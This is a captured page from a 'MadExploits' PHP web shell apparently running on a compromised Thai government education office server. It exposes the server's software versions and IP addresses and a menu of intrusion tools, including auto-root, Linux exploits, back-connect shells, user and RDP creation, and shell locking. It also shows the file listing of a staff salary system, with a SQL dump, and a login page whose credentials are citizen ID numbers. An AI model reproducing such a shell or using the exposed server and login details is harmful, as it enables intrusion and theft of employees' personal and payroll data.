Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
salary29 /
[ HOME SHELL ]
Name
Size
Permission
Action
Connections
[ DIR ]
drwxr-xr-x
_mmServerScripts
[ DIR ]
drwxr-xr-x
_notes
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
admin1
[ DIR ]
drwxr-xr-x
salary2020
[ DIR ]
drwxr-xr-x
salary2021
[ DIR ]
drwxr-xr-x
PHPCounter.txt
8
B
-rwxrwxrwx
apr64.php
11.58
KB
-rw-r--r--
apr65.php
11.58
KB
-rw-r--r--
apr66.php
11.58
KB
-rw-r--r--
apr67.php
11.59
KB
-rw-r--r--
apr68.php
11.59
KB
-rw-r--r--
aug64.php
11.58
KB
-rw-r--r--
aug65.php
11.58
KB
-rw-r--r--
aug66.php
11.58
KB
-rw-r--r--
aug67.php
11.59
KB
-rw-r--r--
aug68.php
11.59
KB
-rw-r--r--
dec63.php
11.4
KB
-rw-r--r--
december64.php
11.59
KB
-rw-r--r--
december65.php
11.59
KB
-rw-r--r--
december66.php
11.59
KB
-rw-r--r--
december67.php
11.6
KB
-rw-r--r--
edit_ok.php
1.33
KB
-rw-r--r--
edit_user.php
6.73
KB
-rw-r--r--
feb64.php
11.41
KB
-rw-r--r--
feb65.php
11.59
KB
-rw-r--r--
feb66.php
11.59
KB
-rw-r--r--
feb67.php
11.59
KB
-rw-r--r--
feb68.php
11.6
KB
-rw-r--r--
index.php
5.9
KB
-rw-r--r--
jan64.php
11.39
KB
-rw-r--r--
jan65.php
11.58
KB
-rw-r--r--
jan66.php
11.58
KB
-rw-r--r--
jan67.php
11.58
KB
-rw-r--r--
jan68.php
11.59
KB
-rw-r--r--
jul64.php
11.58
KB
-rw-r--r--
jul65.php
11.58
KB
-rw-r--r--
jul66.php
11.58
KB
-rw-r--r--
jul67.php
11.59
KB
-rw-r--r--
jul68.php
11.59
KB
-rw-r--r--
jun64.php
11.59
KB
-rw-r--r--
jun65.php
11.59
KB
-rw-r--r--
jun66.php
11.59
KB
-rw-r--r--
jun67.php
11.6
KB
-rw-r--r--
jun68.php
11.6
KB
-rw-r--r--
login_fail.php
1.35
KB
-rw-r--r--
logo2.png
229.12
KB
-rw-r--r--
main.php
17.8
KB
-rw-r--r--
main_.php
8.84
KB
-rw-r--r--
mar64.php
11.58
KB
-rw-r--r--
mar65.php
11.58
KB
-rw-r--r--
mar66.php
11.58
KB
-rw-r--r--
mar67.php
11.58
KB
-rw-r--r--
mar68.php
11.59
KB
-rw-r--r--
may64.php
11.58
KB
-rw-r--r--
may65.php
11.58
KB
-rw-r--r--
may66.php
11.58
KB
-rw-r--r--
may67.php
11.59
KB
-rw-r--r--
may68.php
11.59
KB
-rw-r--r--
nouser.php
6.72
KB
-rw-r--r--
nov63.php
11.4
KB
-rw-r--r--
nov64.php
11.59
KB
-rw-r--r--
nov65.php
11.59
KB
-rw-r--r--
nov66.php
11.59
KB
-rw-r--r--
nov67.php
11.6
KB
-rw-r--r--
oct63.php
11.39
KB
-rw-r--r--
oct64.php
11.58
KB
-rw-r--r--
oct65.php
11.58
KB
-rw-r--r--
oct66.php
11.58
KB
-rw-r--r--
oct67.php
11.59
KB
-rw-r--r--
sep64.php
11.58
KB
-rw-r--r--
sep65.php
11.58
KB
-rw-r--r--
sep66.php
11.58
KB
-rw-r--r--
sep67.php
11.59
KB
-rw-r--r--
slipmanaul.jpg
25.32
KB
-rw-r--r--
slipmanaul.pdf
367.72
KB
-rw-r--r--
spmsalary.sql
697.92
KB
-rw-r--r--
spt.jpg
22.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nouser.php
<?php require_once('../Connections/Connecdata.php'); ?> <?php if (!function_exists("GetSQLValueString")) { function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { if (PHP_VERSION < 6) { $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue; } $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue); switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? doubleval($theValue) : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } } ?> <?php // *** Validate request to login to this site. if (!isset($_SESSION)) { session_start(); } $loginFormAction = $_SERVER['PHP_SELF']; if (isset($_GET['accesscheck'])) { $_SESSION['PrevUrl'] = $_GET['accesscheck']; } if (isset($_POST['username'])) { $loginUsername=$_POST['username']; $password=$_POST['password']; $MM_fldUserAuthorization = ""; $MM_redirectLoginSuccess = "main.php"; $MM_redirectLoginFailed = "index.php"; $MM_redirecttoReferrer = false; mysql_select_db($database_Connecdata, $Connecdata); $LoginRS__query=sprintf("SELECT `user`, pass FROM username_password WHERE `user`=%s AND pass=%s", GetSQLValueString($loginUsername, "-1"), GetSQLValueString($password, "double")); $LoginRS = mysql_query($LoginRS__query, $Connecdata) or die(mysql_error()); $loginFoundUser = mysql_num_rows($LoginRS); if ($loginFoundUser) { $loginStrGroup = ""; if (PHP_VERSION >= 5.1) {session_regenerate_id(true);} else {session_regenerate_id();} //declare two session variables and assign them $_SESSION['MM_Username'] = $loginUsername; $_SESSION['MM_UserGroup'] = $loginStrGroup; if (isset($_SESSION['PrevUrl']) && false) { $MM_redirectLoginSuccess = $_SESSION['PrevUrl']; } header("Location: " . $MM_redirectLoginSuccess ); } else { header("Location: ". $MM_redirectLoginFailed ); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>:: สลิปเงินเดือนพนักงานราชการ ลูกจ้าง สพม.29 ::</title> <style type="text/css"> <!-- .style1 { color: #FF0000; font-weight: bold; } --> </style> </head> <body> <p> </p> <p> </p> <table width="100%" border="0"> <tr> <td align="center"><table width="80%" border="1"> <tr> <td align="center" bgcolor="#FF9900"><h2><strong>สำนักงานเขตพื้นที่การศึกษามัธยมศึกษาเขต 29</strong></h2></td> </tr> <tr> <td align="center"><form id="form1" name="form1" method="POST" action="<?php echo $loginFormAction; ?>"> <p><strong>ระบบแจ้งยอดเงินเดือน ออนไลน์ </strong></p> <p><strong>Username หรือ Password ไม่ถูกต้อง กรุณากรอกใหม่</strong></p> <table width="285" border="0"> <tr> <td colspan="2" align="center" bgcolor="#FF9900">เข้าระบบ</td> </tr> <tr> <td align="right">รหัสผู้ใช้</td> <td><label> <input name="username" type="text" id="username" /> </label></td> </tr> <tr> <td align="right" bgcolor="#FFEED5">รหัสผ่าน</td> <td bgcolor="#FFEED5"><label> <input name="password" type="text" id="password" /> </label></td> </tr> </table> <label> <br /> <input type="submit" name="Submit" value="Submit" /> </label> <p>รหัสผู้ใช้ = เลขประจำตัวประชาชน<br /> รหัสผ่าน = เลขประจำตัวประชาชน<br /> <span class="style1">เพื่อความปลอดภัยของข้อมูลเข้าระบบแล้วกรุณาเปลี่ยนรหัสผ่าน</span></p> <p> <label></label> </p> </form> </td> </tr> <tr> <td align="center" bgcolor="#FF9900"><table width="100%" align="center" cellpadding="0" cellspacing="0"> <tbody> <tr> <td height="20"><div align="center"> <div align="center"><strong>สำนักงานเขตพื้นที่การศึกษามัธยมศึกษาเขต 29( อุบลราชธานี , อำนาจเจริญ )</strong></div> </div></td> </tr> <tr> <td height="16"><div align="center"> <div align="center">ที่ตั้ง : ถนนเลี่ยงเมือง (สี่แยก อ.บ.ต.กุดลาด) บ้านกุดลาด หมู่ที่ 9 ตำบลกุดลาด อำเภอเมือง จังหวัดอุบลราชธานี 34000</div> </div></td> </tr> <tr> <td height="20"><div align="center">ไม่สามารถเข้าระบบได้กรุณาติดต่อ : นางสมปอง บุระดำ 089-8654583 นางสาวพัชรี เงาทอง 0875708979</div></td> </tr> <tr> <td height="20"><div align="center"><strong>เบอร์โทรศัพท์ : </strong>0-4542-2186, Fax : 0-4542-2185<strong> Email :</strong> <a href="mailto:secondary29@obec.go.th">secondary29@obec.go.th</a></div></td> </tr> </tbody> </table> </td> </tr> </table></td> </tr> <tr> <td align="center"><table width="80%" border="0"> <tr> <td align="center"> </td> </tr> </table></td> </tr> </table> </body> </html>
Close